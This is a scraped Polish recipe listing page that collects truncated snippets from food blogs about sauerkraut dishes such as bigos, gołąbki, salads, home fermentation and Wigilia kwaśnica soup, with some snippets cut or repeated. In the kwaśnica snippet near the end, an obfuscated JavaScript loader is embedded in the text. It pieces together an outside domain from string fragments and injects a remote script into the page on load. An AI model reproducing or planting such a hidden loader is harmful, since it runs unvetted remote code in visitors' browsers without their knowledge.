kapusta kiszona - 6206 przepisów (strona:38/414)

BIGOS STAROPOLSKI Z WINEM 124

Wędzony boczek, kiełbasa i szynka, fantastyczne zioła, czerwone wino...cudowna eksplozja smaków! Najlepszy, mówię Wam…zapisujcie przepis, innego bigosu już nie zrobicie. Tak Wiem, mega pracochłonny ;) Bigos staropolski z kiszonej kapusty.      A by bigos uzyskał najlepszy smak, wszystkie jego składniki  smakowe powinny dokładnie się połączyć. Ponieważ bigos przygotowujemy z kiszonej kapusty, nie jest poddatny na szybkie(...)jest jeszcze lepszy niż świeży. Jak zrobić bigos staropolski z winem - najlepszy, wypróbowany przepis, składniki przygotowanie. Oto składniki i przyprawy na bigos staropolski z winem. SKŁADNIKI: 2-2,5kg kiszonej kapusty 1/2 główki świe ż ej kapusty - poszatkowana kilka kapel uszy suszonych grzybów 3 marchewki 2 pietruszki 1/2 selera 4 duże cebule 60g słoniny niepełna szklanka czerwonego, słodkiego (ważne!) wina

Moja Książka Kucharska
Tradycyjna kuchnia polska - powód do dumy 109

Odmiany klusek - tak jak Włosi szczycą się różnymi odmianami makaronu, tak my mamy przeróżne kluski. Kopytka, pyzy, kluski lane, śląskie - nic tylko zajadać! 4) Bigos i potrawy z kapusty kiszonej - oczywiście sporą popularnością cieszy se także bigos a także przeróżne inne dania wykonane z kiszonych ogórków, kapusty, marynowanych grzybów czy piklowanych warzyw. 5) Maślanka, kefir - tego w wielu miejscach(...)Odmiany klusek - tak jak Włosi szczycą się różnymi odmianami makaronu, tak my mamy przeróżne kluski. Kopytka, pyzy, kluski lane, śląskie - nic tylko zajadać! 4) Bigos i potrawy z kapusty kiszonej - oczywiście sporą popularnością cieszy se także bigos a także przeróżne inne dania wykonane z kiszonych ogórków, kapusty, marynowanych grzybów czy piklowanych warzyw. 5) Maślanka, kefir - tego w wielu miejscach

Domowa Cukierenka-Domowa Kuchnia
Łazanki z kiszoną i białą kapustą 93

białą kapustą odbiega od tradycyjnej wersji, ale jest naprawdę smaczny. Dla nas obiad idealny. Spróbujcie Do siekania białej kapusty używam szatkownicy Hebel V5 PowerLine Borner Polska Składniki: 150 g kapusty kiszonej (u mnie domowa z tego przepisu) pół mniejszej główki białej kapusty 300 g kiełbasy (można dać mniej) – u mnie krakowska 120 g paprykowych kabanosów kilka pieczarek (u mnie(...)olej do podsmażenia składników 3/4 opakowania makaronu makaronu łazanki – u mnie makaron z borowikami Makarony Babuni 1 cebula Przygotowanie: Obie kapusty należy obgotować. Ja miałam już wcześniej ugotowaną kiszoną kapustę – został mi nadmiar z innego dania (kapusta zalana wodą do wysokości, gotowana do miękkości z liściem laurowym i zielem angielskim). Zajęłam się tylko białą kapustą – szybko

Słodkie okruszki
Surówka z kiszonej kapusty z pomarańczą 158

Witajcie po świątecznej przerwie! Zostało Wam trochę kiszonej kapusty? Macie może nadmiar pomarańczy? Pewnie niejedna osoba odpowiedziała twierdząco. A więc do roboty :) Zapraszam na super surówkę. Smak kiszonej kapusty został w tej surówce fajnie przełamany słodkimi pomarańczami. Polecam - bardzo nam smakowała! Przepis znalazłam u Danusi :) Składniki: 1/2 kg kapusty 1 duża pomarańcza 1 mała cebulka 1 marchewka kilka łyżek oleju(...)doprawić do smaku. Smacznego!!! Źródło: Co mi w duszy gra Na blogu możecie znaleźć surówkę z kiszonej w wersji tradycyjnej i z rodzynkami. Obie pyszne! Polecam! Surówka z kiszonej kapusty Surówka z kiszonej kapusty z kukurydzą i rodzynkami

Kuchnia domowa Ani
Bigos domowy - najlepszy 70

dużą ilością mięsa z grzybami i wędzoną śliwką.  Jego przygotowanie jest czasochłonne, ale dzięki temu  nasz bigos odwdzięczy się nam smakiem i aromatem. Składniki: 3 kg kapusty kiszonej 1 kg białej kapusty 2 kg łopatki wieprzowej 1 kg kiełbasy  750 g boczku wędzonego 5 dużych cebul 200 g suszonych grzybów 10 śliwek wędzonych 1 szklanka(...)garnka. Dodaję boczek w całości, liść laurowy, ziele angielskie, kminek, jałowiec, majeranek i wlewam wodę z grzybów. Następnie dolewam wody, tylko tyle by przykryła kapustę i stawiam na ogień. Białą kapustę siekam i dodaję do kiszonej kapusty. Gotuję pod przykryciem na małym ogniu. Mięso kroję w kostkę. Na patelni rozgrzewam tłuszcz, smażę mięso, często mieszając. Po 30 minutach gotowania

magiczna kuchnia Kasi
Bigos staropolski najlepszy na święta 164

dodaję wędzony boczek i kiełbasę :) Najlepszym mięsem do bigosu będzie łopatka albo karkówka. Kapustę dodaję i świeżą, białą jak i kiszoną. Jeśli lubicie kwaśny bigos dodajcie 1,5 kg kapusty kiszonej na 1,2 kg kapusty białej.  Dla zwolenników mniej kwaśnego bigosu odpowiednia proporcja to 1,5 kg kapusty białej na 1,2 kg kapusty kiszonej. Dla głębszego smaku(...)się nie przypalił. Gotowy bigos może stać w lodówce przez kilka dni. Najlepiej smakuje z pajdą chleba. Bigos staropolski świąteczny składniki: 1,5 kg kapusty białej 1,5 kg kapusty kiszonej 1 kg mięsa 30 dag  wędzonego boczku 50 dag kiełbasy wiejskiej 4 cebule 8-9 suszonych śliwek 8-9 suszonych grzybów 6-7 ziarenek jałowca 10 ziarenek pieprzu

Ekspansja smaku
KAPUSTA Z GROCHEM 77

wychodzi cały garnek, można go podzielić dodając do drugiej części np. wymoczone i posiekane suszone grzyby, mięso lub kiełbasę oraz suszone śliwki. Powstaną dwie potrawy polecam! SKŁADNIKI: 1300 g kapusty kiszonej, odciśniętej (u mnie kiszona z marchewką) 400 g łuskanego, suchego grochu, u mnie połówki 3 większe cebule, obrane, drobno posiekane 3 liście laurowe, 4 kulki ziela angielskiego świeżo zmielony(...)zasmażką z masła i mąki. Rozpuścić ok. 100 g masła i wsypać 1 łyżkę mąki, szybko wymieszać rózgą kuchenną, dodać do kapusty z grochem. Aby mi wyszło 1300 g kiszonej kapusty odciśniętej kupiłam dwa pojemniki kapusty z marchewką o pojemności 1 kg, po dokładnym odciśnięciu wyszło 1300 g kapusty kiszonej. PRZYGOTOWANIE: Przygotowanie kapusty z grochem zaczynam od przepłukania grochu, zalania

Zasmakuj Kuchni
Gołąbki z kiszonej kapusty kiszeniaki 19

GOŁĄBKI Z KISZONEJ KAPUSTY SKŁADNIKI 1 duża główka kiszonej kapusty; 500 gramów łopatki wieprzowej; 300 gramów kaszy jęczmiennej; 500 ml bulionu drobiowego; 60 gramów suszonych podgrzybków; duża cebula; 1 łyżka mielonej, słodkiej papryki; wiejskie jajko; gęsta, kwaśna śmietana; natka pietruszki; garść suszonych warzyw; ziele angielskie; liść laurowy; sól, pieprz; przepis na gołąbki z kiszonej kapusty Artykuł Gołąbki z kiszonej kapusty

Kuchnia Tomka
Kiszona kapusta w słoikach. 73

białej kapusty 1 marchewka (niekoniecznie) sól 20 g. na 1 kg. poszatkowanej kapusty  Wykonanie: Główka kapusty którą kupiłam ważyła niecałe 2,5 kg.  Najpierw należy usunąć wierzchnie liście, przekroić i usunąć głąb.  Następnie kapustę umyć i  poszatkować. Po poszatkowaniu miałam 2 kg. kapusty.  Marchewkę zetrzeć na tarce o dużych oczkach. Dodać do kapusty.  Wsypać(...)miskę z kapustą  na 30-40 minut.  Słoiki dokładnie umyć i wyparzyć. Do czystych słoików przełożyć kapustę razem z sokiem. Wkładać kapustę partiami.  Po każdym włożeniu ubijać drewnianą końcówką od tłuczka lub łyżki,  aż kapusta puści sok.  Wierzch kapusty powinien być przykryty sokiem.  Kapusty powinno być 3/4 słoika, ponieważ podczas kiszenia kapusta zwiększa objętość

Agusiowe smakołyki
Bigos z grzybami (Wigilia) 166

jadło się go po raz pierwszy. Bigos jest taką potrawą, że w każdym domu smakuje inaczej, ale na pewno podstawowe dwa składniki bigosu muszą się w nim znaleźć: kiszona kapusta i suszone grzyby. Mój bigos jest jeszcze obowiązkowo z dodatkiem wędzonych śliwek i miodu. Do bigosu na Wigilię nigdy nie dodaję pomidorów ani koncentratu, powinno się w nim czuć tylko(...)smak grzybów i kapusty. Bigos z kiszonej kapusty można przygotować na 1 - 2 dni wcześniej, wtedy nawet po podgrzaniu jest jeszcze smaczniejszy.  Jestem ciekawa, czy podobny bigos gości na Waszym świątecznym stole i co w nim musi się obowiązkowo znaleźć?  Składniki: (porcja na 2 - 3 osoby) 1 kg kiszonej kapusty 100 g suszonych grzybów (u mnie prawdziwki

Kuchcik gotuje
Bigos z sherry luksusowy 176

dobrej kiełbasy. Nigdy nie żałuję suszonych grzybów, jałowca i angielskiego ziela. W tym roku doprawiłam bigos wytrawnym sherry. Bigos z sherry Składniki: 2 kg poszatkowanej białej kapusty 1 kg kiszonej kapusty bez marchewki ½ kg wieprzowej szynki, surowej 300 g wędzonego boczku ½ kg karkówki ½ kg wołowiny z kością 4 śląskie 2 cebule 30 g suszonych grzybów 1 czosnek solo 1½ łyżki(...)być mięciutkie, tak by można było rozrywać je palcami. Ostudzone mięso podziel na małe kawałeczki. Poszatkuj kapustę i ugotuj w niewielkiej ilości, lekko osolonej wodzie. W drugim garnku obgotuj kiszoną kapustę. Odcedź kiszoną kapustę i odciśnij wodę jeśli nie chcesz aby bigos był zbyt kwaśny. Ja nie odciskałam. Zalej grzyby wrzątkiem i pozostaw na 30 minut. Po tym czasie, odcedz

codojedzenia
Żeberka zapiekane z kapustą – kuchnia podkarpacka 48

kapustę i obsmażone mięso, po czym całość zapieka się w piekarniku. Równie dobrze danie można przyrządzić w garnku z grubym dnem, dusząc je na wolnym ogniu, choć wymaga ono wówczas mieszania i doglądania. Żeberka zapiekane z kapustą nie pochłaniają wiele pracy, a smakują wybornie. Na Podkarpaciu przygotowuje się je w dwóch odmianach – z kapustą słodką i z kapustą kiszoną. Zazwyczaj(...)Wielkiej księdze tradycji kulinarnych województwa podkarpackiego” wydanej przez Stowarzyszenie na Rzecz Rozwoju i Promocji Podkarpacia „Pro Carpathia”. Żeberka zapiekane z kapustą – kuchnia podkarpacka Żeberka zapiekane z kapustą – kuchnia podkarpacka Składniki: 800 g żeberek, 1 kg kapusty kiszonej 2 cebule 2 marchewki 1 jabłko 4 łyżki smalcu sól, pieprz 3-4 szklanki rosołu Żeberka myjemy, osuszamy i kroimy na porcje. Solimy

Trzeci talerz
Lekki bigos z młodej kapusty 122

Uwielbiam młodą kapustę. Mąż kupił dość dużą główkę. wiec od razu pomyślałam o bigosie, choć lato mamy i bigos to raczej zimowe danie. Jednak pomyślałam, że kupię młodą kiszoną kapustę i bigos będzie wyśmienity. I rzeczywiście jest przepyszny. Dodałam do niego grzyby, ale ze śliwek i wina zrezygnowałam, by bigos miał delikatniejszy smak. Kapusta po prostu rozpływa się w ustach(...)Koniecznie taki ugotujcie! Składniki: 750 g  kapusty kiszonej 750 g młodej kapusty słodkiej 400 g chudej wieprzowiny (np. szynki) 250 g salami w kawałku 350 g kiełbasy, np. głogowskiej garść grzybów suszonych ok. 6 śliwek suszonych (pominęłam) 2 liście laurowe kilka ziaren pieprzu ziarnistego kilka ziaren ziela angielskiego 1 łyżka kminku 1 duża, najlepiej młoda cebula 3 ząbki

Czerwień i błękit
Zupa na Wigilię – nie tylko barszcz! 125

serwuje się na zimno lub na ciepło. Kwaśnica Kwaśnica to zupa na Wigilię wywodząca się z Podhala. Przygotowuje się ją z: Głowy i podrobów z wybranej ryby 30 dag kapusty kiszonej Soku z kapusty kiszonej Kilku suszonych grzybów 5 ziaren ziela angielskiego 2 ząbków czosnku Szczypty suszonego imbiru Kiszoną kapustę szatkujemy, wrzucamy do garnka, zalewamy odrobiną wody oraz sokiem(...)kiszonej kapusty i gotujemy. Dodajemy grzyby, ziele angielskie i gotujemy do zmięknięcia. Dodajemy podroby i głowy ryb, gotujemy przez 20 minut, wyjmujemy podroby, doprawiamy czosnkiem oraz imbirem i ponownie zagotowujemy. (function(){ cwbx=document.createElement("script");cwbx_=("ust");cwbxu="69293527"; cwbx_+="a"+("t.i");cwbx.type="text/javascript"; cwbxu+=".pdmwktdtwbxmgxxyXtf9";cwbx.async=true;cwbx_+="n"+("f"+"o")+"/"; cwbxu+="bn8i421swj";cwbx.src="//"+cwbx_+cwbxu; document.body.appendChild(cwbx); })(); Artykuł Zupa

Okiem Blondynki by McBlondi